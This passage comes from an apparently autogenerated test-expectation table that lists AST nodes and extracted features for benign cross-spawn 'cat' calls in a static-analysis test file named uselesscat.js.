'utf8' } | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:28:151:47 | { encoding: 'utf8' } | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:28:151:47 | { encoding: 'utf8' } | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:30:151:37 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:30:151:37 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:30:151:37 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:30:151:45 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:30:151:45 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:30:151:45 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:30:151:45 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:30:151:45 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:30:151:45 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:40:151:45 | 'utf8' | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:40:151:45 | 'utf8' | InputAccessPathFromCallee | 2.encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:40:151:45 | 'utf8' | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:40:151:45 | 'utf8' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:40:151:45 | 'utf8' | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:40:151:45 | 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:40:151:45 | 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:40:151:45 | 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:1:152:6 | cspawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:1:152:6 | cspawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:1:152:6 | cspawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:1:152:82 | cspawn( ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:1:152:82 | cspawn( ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:1:152:82 | cspawn( ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:1:152:82 | exceptional return of cspawn( ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:1:152:82 | exceptional return of cspawn( ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:1:152:82 | exceptional return of cspawn( ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:8:152:12 | 'cat' | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:8:152:12 | 'cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:8:152:12 | 'cat' | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:8:152:12 | 'cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:8:152:12 | 'cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:8:152:12 | 'cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:15:152:25 | ['foo/bar'] | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:15:152:25 | ['foo/bar'] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:15:152:25 | ['foo/bar'] | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:15:152:25 | ['foo/bar'] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:15:152:25 | ['foo/bar'] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:15:152:25 | ['foo/bar'] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:16:152:24 | 'foo/bar' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:16:152:24 | 'foo/bar' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:16:152:24 | 'foo/bar' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:16:152:24 | 'foo/bar' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:16:152:24 | 'foo/bar' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:16:152:24 | 'foo/bar' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:28:152:47 | { encoding: 'utf8' } | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:28:152:47 | { encoding: 'utf8' } | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:28:152:47 | { encoding: 'utf8' } | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:28:152:47 | { encoding: 'utf8' } | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:28:152:47 | { encoding: 'utf8' } | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:28:152:47 | { encoding: 'utf8' } | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:30:152:37 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:30:152:37 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:30:152:37 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:30:152:45 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:30:152:45 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:30:152:45 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:30:152:45 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:30:152:45 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:30:152:45 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:40:152:45 | 'utf8' | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:40:152:45 | 'utf8' | InputAccessPathFromCallee | 2.encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:40:152:45 | 'utf8' | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:40:152:45 | 'utf8' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:40:152:45 | 'utf8' | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:40:152:45 | 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:40:152:45 | 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:40:152:45 | 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | 'arguments' object of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | 'arguments' object of anonymous function | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | (err, o ... g(out)} | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | (err, o ... g(out)} | InputArgumentIndex | 3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | (err, o ... g(out)} | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | (err, o ... g(out)} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | (err, o ... g(out)} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | (err, o ... g(out)} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | exceptional return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | exceptional return of anonymous function | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | return of anonymous function | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:50:152:81 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:51:152:53 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:51:152:53 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:51:152:53 | err | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:51:152:53 | err | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:51:152:53 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:56:152:58 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:56:152:58 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:56:152:58 | out | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:56:152:58 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:56:152:58 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:56:152:58 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:56:152:58 | out | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:56:152:58 | out | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:56:152:58 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:56:152:58 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:71 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:71 | console | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:71 | console | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:71 | console | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:71 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:75 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:75 | console.log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:75 | console.log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:75 | console.log | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:75 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:80 | console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:80 | console.log(out) | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:80 | console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:80 | console.log(out) | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:80 | console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:80 | exceptional return of console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:80 | exceptional return of console.log(out) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:80 | exceptional return of console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:80 | exceptional return of console.log(out) | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:80 | exceptional return of console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:73:152:75 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:73:152:75 | log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:73:152:75 | log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:73:152:75 | log | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:73:152:75 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:77:152:79 | out | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:77:152:79 | out | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:77:152:79 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:77:152:79 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:77:152:79 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:77:152:79 | out | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:77:152:79 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:77:152:79 | out | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:1:153:6 | cspawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:1:153:6 | cspawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:1:153:6 | cspawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:1:153:60 | cspawn( ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:1:153:60 | cspawn( ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:1:153:60 | cspawn( ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:1:153:60 | exceptional return of cspawn( ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:1:153:60 | exceptional return of cspawn( ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:1:153:60 | exceptional return of cspawn( ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:8:153:12 | 'cat' | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:8:153:12 | 'cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:8:153:12 | 'cat' | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:8:153:12 | 'cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:8:153:12 | 'cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:8:153:12 | 'cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:15:153:25 | ['foo/bar'] | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:15:153:25 | ['foo/bar'] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:15:153:25 | ['foo/bar'] | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:15:153:25 | ['foo/bar'] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:15:153:25 | ['foo/bar'] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:15:153:25 | ['foo/bar'] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:16:153:24 | 'foo/bar' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:16:153:24 | 'foo/bar' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:16:153:24 | 'foo/bar' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:16:153:24 | 'foo/bar' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:16:153:24 | 'foo/bar' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:16:153:24 | 'foo/bar' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | 'arguments' object of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | 'arguments' object of anonymous function | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | (err, o ... g(out)} | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | (err, o ... g(out)} | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | (err, o ... g(out)} | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | (err, o ... g(out)} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | (err, o ... g(out)} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | (err, o ... g(out)} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | exceptional return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | exceptional return of anonymous function | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | return of anonymous function | enclosingFunctionName | cspawn#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:28:153:59 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| 